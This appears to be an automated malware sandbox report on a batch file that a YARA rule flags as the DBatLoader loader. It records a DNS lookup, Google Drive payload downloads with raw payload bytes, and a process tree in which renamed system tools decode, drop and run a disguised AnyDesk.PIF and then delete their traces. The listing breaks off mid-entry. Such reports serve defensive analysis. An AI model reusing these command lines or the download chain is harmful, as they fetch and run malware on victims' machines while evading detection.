Nov 30, 2024 21:24:06.870774984 CET	1.1.1.1	192.168.2.4	0xe7e3	Name error (3)	bbhmeetre1ms.freeddns.org	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	172.217.19.238	443	3288	C:\Users\Public\Libraries\AnyDesk.PIF

Timestamp	Bytes transferred	Direction	Data
2024-11-30 20:20:01 UTC	205	OUT	GET /uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: drive.google.com
2024-11-30 20:20:01 UTC	1319	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 30 Nov 2024 20:20:01 GMT Location: https://drive.usercontent.google.com/download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-_WWRKMy-gtKUpSsIxtA2wQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	142.250.181.33	443	3288	C:\Users\Public\Libraries\AnyDesk.PIF

Timestamp	Bytes transferred	Direction	Data
2024-11-30 20:20:03 UTC	223	OUT	GET /download?id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv&export=download HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: drive.usercontent.google.com
2024-11-30 20:20:06 UTC	4918	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="233_Puyiaiobyjk" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 1072224 Last-Modified: Fri, 29 Nov 2024 11:10:45 GMT X-GUploader-UploadID: AFiumC7PKzFG6Nx6_YMMATmGWDXVt1GEZrI7SJOIgfsn2Bm-frfzo7Wcpth--poSDHq6_ZgupfJwJLWVZg Date: Sat, 30 Nov 2024 20:20:06 GMT Expires: Sat, 30 Nov 2024 20:20:06 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=8Zc5gQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-30 20:20:06 UTC	4918	IN	Data Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 68 4a 77 38 56 48 68 38 6a 4a 42 45 61 45 68 67 6c 45 51 34 50 4a 42 38 57 45 52 59 6a 45 51 38 64 49 78 49 59 47 68 55 66 47 69 51 6c 44 78 45 64 45 67 34 53 45 43 63 65 4a 69 55 4f 49 78 30 64 44 68 38 61 44 69 51 61 4a 69 55 65 45 77 38 69 45 69 63 69 48 53 45 52 45 68 6b 56 4a 52 49 55 48 43 45 56 4a 53 49 4f 45 53 49 5a 45 52 34 65 45 43 55 61 70 71 36 6c 57 53 4f 6e 73 55 76 39 49 69 59 57 44 68 59 63 44 79 59 58 47 4b 61 75 70 56 6b 6a 70 37 46 4c 7a 4e 72 43 79 4e 48 53 7a 73 2b 38 78 62 33 4c 32 4c 7a 42 77 73 2f 53 79 62 7a 4a 7a 72 7a 43 30 4d 36 39 79 38 58 49 30 73 58 50 32 4d 4b 38 30 4c 33 42 76 63 50 61 30 64 6e 59 77 63 37 51 30 4d 48 53 78 63 48 50 78 64 6e 59 30 62 37 43 7a 62 33 61 7a 64 44 4d 76 4c 33 Data Ascii: pq6lWSOnsUshJw8VHh8jJBEaEhglEQ4PJB8WERYjEQ8dIxIYGhUfGiQlDxEdEg4SECceJiUOIx0dDh8aDiQaJiUeEw8iEiciHSEREhkVJRIUHCEVJSIOESIZER4eECUapq6lWSOnsUv9IiYWDhYcDyYXGKaupVkjp7FLzNrCyNHSzs+8xb3L2LzBws/SybzJzrzC0M69y8XI0sXP2MK80L3BvcPa0dnYwc7Q0MHSxcHPxdnY0b7Czb3azdDMvL3
2024-11-30 20:20:06 UTC	4861	IN	Data Raw: 66 53 68 65 47 6d 43 42 2f 4f 5a 73 47 78 78 77 76 48 39 46 6f 33 6a 30 35 79 4e 75 6b 4f 38 37 33 32 75 47 50 6c 7a 61 74 39 73 42 41 48 74 4c 4d 34 4a 61 59 51 32 4b 69 47 53 35 62 58 4d 33 4d 2b 52 46 39 6c 4b 39 66 49 49 69 38 54 66 67 47 66 71 34 37 35 72 55 59 68 6a 30 65 44 6a 52 75 4c 64 6f 2b 7a 6d 43 66 6e 43 31 46 7a 38 6d 63 46 56 69 38 6b 49 47 58 59 6d 71 6b 7a 63 56 64 63 61 56 35 4a 46 46 44 6d 56 34 79 47 56 61 37 2b 73 73 73 4c 41 71 47 53 67 45 53 52 2b 64 37 72 55 6d 4d 79 37 39 6f 4d 63 31 45 78 66 4e 37 71 63 6f 46 38 79 6f 74 64 47 35 74 6b 34 31 42 31 72 30 6a 5a 30 6e 4e 64 4a 32 64 55 6e 44 66 79 51 48 58 7a 34 5a 2b 4f 41 31 30 50 76 33 61 49 30 45 45 56 4b 51 75 74 50 51 68 68 5a 4f 5a 39 4a 64 63 37 5a 35 43 69 36 62 34 4d 41 Data Ascii: fSheGmCB/OZsGxxwvH9Fo3j05yNukO8732uGPlzat9sBAHtLM4JaYQ2KiGS5bXM3M+RF9lK9fIIi8TfgGfq475rUYhj0eDjRuLdo+zmCfnC1Fz8mcFVi8kIGXYmqkzcVdcaV5JFFDmV4yGVa7+sssLAqGSgESR+d7rUmMy79oMc1ExfN7qcoF8yotdG5tk41B1r0jZ0nNdJ2dUnDfyQHXz4Z+OA10Pv3aI0EEVKQutPQhhZOZ9Jdc7Z5Ci6b4MA
2024-11-30 20:20:06 UTC	1323	IN	Data Raw: 78 75 6c 4f 53 53 30 4a 33 6e 59 5a 58 35 53 56 32 56 35 6c 34 2b 59 58 36 31 46 39 6c 49 71 50 7a 35 76 62 42 77 65 73 57 56 4c 74 77 47 30 35 6b 39 4a 45 68 43 4c 46 45 2b 48 64 32 57 47 63 4f 45 55 44 6d 73 79 35 34 55 6c 57 4a 64 38 56 46 43 4b 71 31 32 42 6b 51 53 75 6d 39 43 69 54 57 30 2f 53 6e 54 39 59 78 4f 39 6a 61 75 36 2f 47 56 33 54 6b 4e 46 47 2b 46 41 63 56 6d 2b 76 76 7a 44 56 47 31 2f 49 31 59 76 78 78 57 7a 65 62 30 36 43 46 6a 46 4f 75 64 68 2b 65 36 35 72 6c 4f 36 48 65 53 54 6f 31 37 2f 36 62 6b 47 6b 5a 54 6c 39 4d 6e 6f 78 54 55 69 5a 50 6c 76 31 50 59 56 49 35 6b 39 74 49 6a 52 31 6f 71 34 2f 78 38 56 74 69 6a 78 2b 65 68 64 6c 62 53 46 2f 74 38 2b 7a 69 77 50 4e 31 5a 64 34 52 4e 53 39 5a 4f 53 53 6f 51 6c 30 47 51 35 39 66 74 32 Data Ascii: xulOSS0J3nYZX5SV2V5l4+YX61F9lIqPz5vbBwesWVLtwG05k9JEhCLFE+Hd2WGcOEUDmsy54UlWJd8VFCKq12BkQSum9CiTW0/SnT9YxO9jau6/GV3TkNFG+FAcVm+vvzDVG1/I1YvxxWzeb06CFjFOudh+e65rlO6HeSTo17/6bkGkZTl9MnoxTUiZPlv1PYVI5k9tIjR1oq4/x8Vtijx+ehdlbSF/t8+ziwPN1Zd4RNS9ZOSSoQl0GQ59ft2
2024-11-30 20:20:06 UTC	1390	IN	Data Raw: 35 39 65 73 54 43 59 58 6a 79 51 57 42 68 61 46 71 43 57 4d 6c 47 30 5a 53 57 34 33 54 66 43 76 50 6c 65 6e 6d 4c 33 30 72 4d 56 2b 73 57 76 54 64 6f 6f 49 65 50 65 2b 61 58 52 2b 41 6d 4b 56 6e 75 39 42 75 43 67 6d 67 54 49 45 6a 4c 47 65 52 79 49 6e 6b 47 58 30 6d 64 30 6c 5a 64 4e 68 7a 44 65 70 6a 55 4d 46 69 35 53 65 59 76 5a 77 43 54 63 54 41 37 6e 4d 2b 47 33 34 6c 6a 50 49 6c 4a 35 30 43 4a 48 62 67 6e 62 72 76 2f 62 50 6f 4d 79 55 73 43 53 49 2b 6b 4d 37 38 51 45 49 7a 67 46 61 4b 78 5a 74 37 67 36 4b 65 39 66 58 35 44 72 77 4b 58 72 7a 4f 78 63 38 2f 53 62 37 53 64 78 4b 72 4c 79 4f 58 64 56 45 32 4f 71 6e 63 5a 6f 4a 53 4a 75 52 78 74 37 41 64 4e 64 78 61 45 6d 66 32 4e 78 59 47 4d 31 67 43 4f 41 6a 4e 4d 72 75 37 49 74 42 5a 43 4e 38 44 69 35 Data Ascii: 59esTCYXjyQWBhaFqCWMlG0ZSW43TfCvPlenmL30rMV+sWvTdooIePe+aXR+AmKVnu9BuCgmgTIEjLGeRyInkGX0md0lZdNhzDepjUMFi5SeYvZwCTcTA7nM+G34ljPIlJ50CJHbgnbrv/bPoMyUsCSI+kM78QEIzgFaKxZt7g6Ke9fX5DrwKXrzOxc8/Sb7SdxKrLyOXdVE2OqncZoJSJuRxt7AdNdxaEmf2NxYGM1gCOAjNMru7ItBZCN8Di5
2024-11-30 20:20:06 UTC	1390	IN	Data Raw: 43 74 6b 4b 47 70 72 78 79 31 30 64 63 38 76 46 56 69 6e 41 62 64 4e 77 2f 71 4a 58 68 47 75 49 50 77 2f 67 46 58 47 79 59 48 52 77 44 75 71 6b 78 38 49 44 73 6a 6e 63 57 6c 37 74 30 79 59 35 55 7a 32 52 2b 54 71 59 6d 57 31 64 6a 30 32 66 30 43 62 47 4a 35 4b 73 6d 38 6b 45 53 46 50 51 69 67 69 39 41 69 4d 6c 75 49 34 4e 74 34 6a 35 4f 4f 41 6a 6e 36 63 48 2b 59 66 57 50 4f 45 57 35 79 67 63 44 56 4c 65 6e 31 55 6d 51 74 57 6b 67 4e 41 52 55 46 51 36 6d 47 31 51 77 34 75 38 63 52 6a 4a 4d 45 70 51 78 31 6b 35 4a 38 30 34 53 62 44 71 48 46 52 65 47 5a 67 6e 56 76 75 79 44 46 6c 2b 4d 77 7a 5a 66 36 4c 2f 72 64 66 39 70 30 63 4f 73 47 55 44 46 38 55 6c 44 56 50 43 78 4b 78 52 48 53 6c 37 54 73 58 50 57 46 58 4c 63 38 43 6a 50 54 30 53 31 61 32 2b 78 4c 6c Data Ascii: CtkKGprxy10dc8vFVinAbdNw/qJXhGuIPw/gFXGyYHRwDuqkx8IDsjncWl7t0yY5Uz2R+TqYmW1dj02f0CbGJ5Ksm8kESFPQigi9AiMluI4Nt4j5OOAjn6cH+YfWPOEW5ygcDVLen1UmQtWkgNARUFQ6mG1Qw4u8cRjJMEpQx1k5J804SbDqHFReGZgnVvuyDFl+MwzZf6L/rdf9p0cOsGUDF8UlDVPCxKxRHSl7TsXPWFXLc8CjPT0S1a2+xLl
2024-11-30 20:20:06 UTC	1390	IN	Data Raw: 69 7a 76 45 6e 30 49 63 4c 61 57 71 73 53 37 52 44 4b 46 2f 2f 53 31 6b 54 66 7a 5a 57 31 70 2f 56 39 73 4e 69 47 4d 4a 4a 58 5a 4a 66 67 65 76 48 51 56 52 75 61 77 58 6a 41 38 53 30 72 54 5a 62 70 70 33 39 73 53 66 68 6e 31 6d 78 4f 2f 38 52 56 31 47 6a 51 33 71 75 4e 43 41 52 2b 62 4a 51 31 2b 50 47 64 79 59 6e 45 70 46 63 30 44 49 79 6b 36 6e 4b 47 4e 66 79 6f 38 32 72 72 4b 52 78 41 4f 33 39 6b 42 76 4d 74 6f 48 79 48 7a 56 61 61 79 45 70 31 5a 4b 62 4c 51 7a 34 33 4c 2f 63 75 49 74 47 4e 65 56 47 37 6a 64 67 6d 6a 36 6b 34 50 33 77 4a 73 43 34 69 6f 45 33 4a 34 31 7a 6f 31 4f 33 5a 41 63 54 50 65 53 57 73 46 49 37 4e 48 71 42 38 51 4a 41 56 64 38 4d 32 69 64 41 65 48 4a 63 39 56 50 62 6c 78 74 35 70 75 64 77 45 70 6f 32 48 31 39 76 58 77 44 59 79 48 Data Ascii: izvEn0IcLaWqsS7RDKF//S1kTfzZW1p/V9sNiGMJJXZJfgevHQVRuawXjA8S0rTZbpp39sSfhn1mxO/8RV1GjQ3quNCAR+bJQ1+PGdyYnEpFc0DIyk6nKGNfyo82rrKRxAO39kBvMtoHyHzVaayEp1ZKbLQz43L/cuItGNeVG7jdgmj6k4P3wJsC4ioE3J41zo1O3ZAcTPeSWsFI7NHqB8QJAVd8M2idAeHJc9VPblxt5pudwEpo2H19vXwDYyH
2024-11-30 20:20:06 UTC	1390	IN	Data Raw: 45 35 76 30 42 77 49 44 63 43 4f 72 55 4e 34 73 71 50 77 55 6d 2f 76 58 30 35 71 54 67 58 6d 50 62 4f 72 69 58 65 2f 59 46 32 6e 6b 6a 41 4e 6d 4d 64 61 69 63 77 62 47 4c 4c 41 61 6a 32 47 48 2b 46 63 2f 46 6b 52 45 2f 72 33 2b 6e 66 53 68 6a 6a 5a 4e 7a 62 54 4a 32 74 5a 76 45 52 30 58 57 45 53 48 74 38 34 46 7a 76 39 48 45 59 77 59 76 6d 31 7a 6e 66 7a 35 5a 6d 6a 5a 47 57 57 2f 35 61 62 30 4b 68 39 4e 34 71 56 34 74 72 76 70 54 57 37 65 58 6d 33 4b 46 43 4f 71 6b 50 6f 2f 62 45 65 43 6b 41 47 52 62 39 6a 59 6e 35 6c 37 4b 36 2f 39 66 2b 72 6e 53 4a 43 56 44 38 34 33 6b 55 34 69 68 4d 6c 4c 4e 73 2f 67 45 75 6b 54 2b 66 79 6d 52 69 62 4e 57 46 4e 69 4c 35 42 72 4a 6b 4c 39 65 2b 2b 44 47 31 6c 54 76 70 2f 42 51 56 37 5a 4e 64 49 6a 2f 4c 77 4e 70 66 49 Data Ascii: E5v0BwIDcCOrUN4sqPwUm/vX05qTgXmPbOriXe/YF2nkjANmMdaicwbGLLAaj2GH+Fc/FkRE/r3+nfShjjZNzbTJ2tZvER0XWESHt84Fzv9HEYwYvm1znfz5ZmjZGWW/5ab0Kh9N4qV4trvpTW7eXm3KFCOqkPo/bEeCkAGRb9jYn5l7K6/9f+rnSJCVD843kU4ihMlLNs/gEukT+fymRibNWFNiL5BrJkL9e++DG1lTvp/BQV7ZNdIj/LwNpfI
2024-11-30 20:20:06 UTC	1390	IN	Data Raw: 38 46 78 35 65 36 78 71 59 6a 2b 35 58 50 39 35 49 36 2f 68 46 64 68 58 6a 69 70 6f 2b 77 70 73 4b 43 6e 53 68 31 62 55 79 38 7a 2f 6f 31 79 50 41 6a 6f 4d 45 4c 2b 68 31 74 74 61 53 2f 34 30 77 33 6c 70 6a 4e 45 69 62 39 64 4e 73 6e 5a 38 55 61 6b 71 62 39 53 67 74 39 49 78 62 66 59 74 2b 77 77 4e 72 2f 2b 2b 63 59 6f 4d 4c 54 33 7a 61 36 50 59 32 35 71 35 34 31 64 2f 44 6b 56 50 76 42 6c 77 57 4f 32 59 52 36 55 50 76 6a 78 74 41 4f 5a 6f 6f 4c 75 69 36 47 50 4c 72 4b 64 69 65 6f 37 77 6f 42 54 70 31 42 79 35 45 34 6b 54 51 76 41 39 6c 74 39 53 4a 2f 6d 46 65 75 4f 6c 6a 2b 7a 66 79 31 30 75 34 52 38 55 58 41 77 4d 56 53 50 62 55 66 46 4b 75 74 5a 4c 32 4f 38 6b 53 4f 66 6b 51 4d 2f 69 70 61 2b 6f 54 6f 7a 6a 47 30 59 4c 54 53 6e 51 44 68 52 52 46 6c 6b Data Ascii: 8Fx5e6xqYj+5XP95I6/hFdhXjipo+wpsKCnSh1bUy8z/o1yPAjoMEL+h1ttaS/40w3lpjNEib9dNsnZ8Uakqb9Sgt9IxbfYt+wwNr/++cYoMLT3za6PY25q541d/DkVPvBlwWO2YR6UPvjxtAOZooLui6GPLrKdieo7woBTp1By5E4kTQvA9lt9SJ/mFeuOlj+zfy10u4R8UXAwMVSPbUfFKutZL2O8kSOfkQM/ipa+oTozjG0YLTSnQDhRRFlk
2024-11-30 20:20:06 UTC	1390	IN	Data Raw: 46 4b 63 64 34 51 30 4b 77 38 4c 38 73 4e 64 46 4e 6c 78 61 38 7a 78 5a 69 4a 57 43 65 6c 69 45 4f 33 35 64 57 39 77 4e 36 72 68 65 64 52 31 70 61 7a 6e 53 2f 75 6d 74 59 76 67 75 74 43 6a 6f 44 72 41 65 5a 36 79 66 44 59 50 76 75 53 69 4b 47 6f 77 34 35 43 4c 46 30 75 68 36 5a 7a 72 58 71 4d 64 79 4e 75 76 63 51 38 59 32 2b 31 71 32 4e 63 35 63 58 47 2b 34 71 45 37 5a 4a 55 74 37 71 50 70 6d 4e 48 2f 75 39 65 4c 63 6a 68 77 42 36 67 2b 35 52 67 63 31 6a 4d 4a 72 55 68 49 76 37 78 45 62 30 57 6f 79 47 7a 65 4e 44 68 45 56 7a 71 67 5a 33 35 4d 6d 41 33 37 42 31 63 55 41 59 6e 52 38 53 47 56 2b 30 63 44 53 6c 46 33 7a 4c 5a 51 71 76 48 49 4c 6a 30 66 4b 45 6c 37 6d 67 66 74 76 4a 77 77 57 54 59 52 48 6f 64 79 50 51 58 45 69 53 6a 56 71 6a 6d 55 71 6c 30 30 Data Ascii: FKcd4Q0Kw8L8sNdFNlxa8zxZiJWCeliEO35dW9wN6rhedR1paznS/umtYvgutCjoDrAeZ6yfDYPvuSiKGow45CLF0uh6ZzrXqMdyNuvcQ8Y2+1q2Nc5cXG+4qE7ZJUt7qPpmNH/u9eLcjhwB6g+5Rgc1jMJrUhIv7xEb0WoyGzeNDhEVzqgZ35MmA37B1cUAYnR8SGV+0cDSlF3zLZQqvHILj0fKEl7mgftvJwwWTYRHodyPQXEiSjVqjmUql00
2024-11-30 20:20:06 UTC	1390	IN	Data Raw: 45 4f 36 52 46 73 73 78 7a 34 56 76 4b 69 34 57 4a 52 43 71 45 33 49 64 61 42 6e 78 77 43 5a 66 64 62 30 55 41 6f 6b 53 5a 30 36 35 4d 4f 57 4d 53 78 6e 71 70 4e 76 74 63 55 49 5a 39 31 39 79 76 52 4e 76 41 58 50 76 63 35 36 65 4a 73 7a 63 6f 72 70 59 31 42 42 39 72 2f 68 6d 47 42 56 6a 43 69 71 56 52 31 59 54 33 37 63 50 72 30 2b 45 6e 4f 4d 49 53 71 52 59 55 71 54 65 66 7a 2f 50 5a 55 57 6d 4a 76 6d 6d 35 6a 41 48 71 57 71 4b 36 6f 66 54 50 30 62 64 53 58 6d 6c 47 63 6b 71 72 45 67 6f 4f 48 34 66 59 6b 2f 46 77 53 32 49 4d 4c 4f 39 63 7a 67 46 4e 41 38 68 39 49 34 59 37 35 36 57 47 4d 57 58 75 74 36 45 48 54 76 53 33 53 45 47 47 59 4c 4d 46 6f 77 39 62 6e 61 4a 56 4e 39 33 6c 2f 5a 41 76 37 2b 69 57 6d 35 47 5a 45 6b 7a 69 45 43 72 7a 78 63 42 53 5a 65 Data Ascii: EO6RFssxz4VvKi4WJRCqE3IdaBnxwCZfdb0UAokSZ065MOWMSxnqpNvtcUIZ919yvRNvAXPvc56eJszcorpY1BB9r/hmGBVjCiqVR1YT37cPr0+EnOMISqRYUqTefz/PZUWmJvmm5jAHqWqK6ofTP0bdSXmlGckqrEgoOH4fYk/FwS2IMLO9czgFNA8h9I4Y756WGMWXut6EHTvS3SEGGYLMFow9bnaJVN93l/ZAv7+iWm5GZEkziECrzxcBSZe

Target ID:	0
Start time:	15:19:54
Start date:	30/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\saw.bat" "
Imagebase:	0x7ff6f1bf0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:19:54
Start date:	30/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:19:55
Start date:	30/11/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Imagebase:	0x7ff79aab0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:19:55
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:	0x7ff7823d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:19:55
Start date:	30/11/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:	0x7ff79aab0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:19:55
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Imagebase:	0x7ff7823d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:19:55
Start date:	30/11/2024
Path:	C:\Users\Public\kn.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
Imagebase:	0x7ff6a29c0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:19:56
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Imagebase:	0x7ff7823d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:19:56
Start date:	30/11/2024
Path:	C:\Users\Public\kn.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
Imagebase:	0x7ff6a29c0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:19:57
Start date:	30/11/2024
Path:	C:\Users\Public\Libraries\AnyDesk.PIF
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\AnyDesk.PIF
Imagebase:	0x400000
File size:	1'058'816 bytes
MD5 hash:	35811E8D8969BEF5354C7C3E6DBEFB27
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 24%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:19:57
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Imagebase:	0x7ff7823d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:19:57
Start date:	30/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
Imagebase:	0x7ff7823d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:20:09
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\boiaiyuP.cmd" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:20:09
Start date:	30/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:20:09
Start date:	30/11/2024
Path:	C:\Windows\SysWOW64\esentutl.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Imagebase:	0xa60000
File size:	352'768 bytes
MD5 hash:	5F5105050FBE68E930486635C5557F84
Has elevated privileges:	true
Has administrator privileges:	true
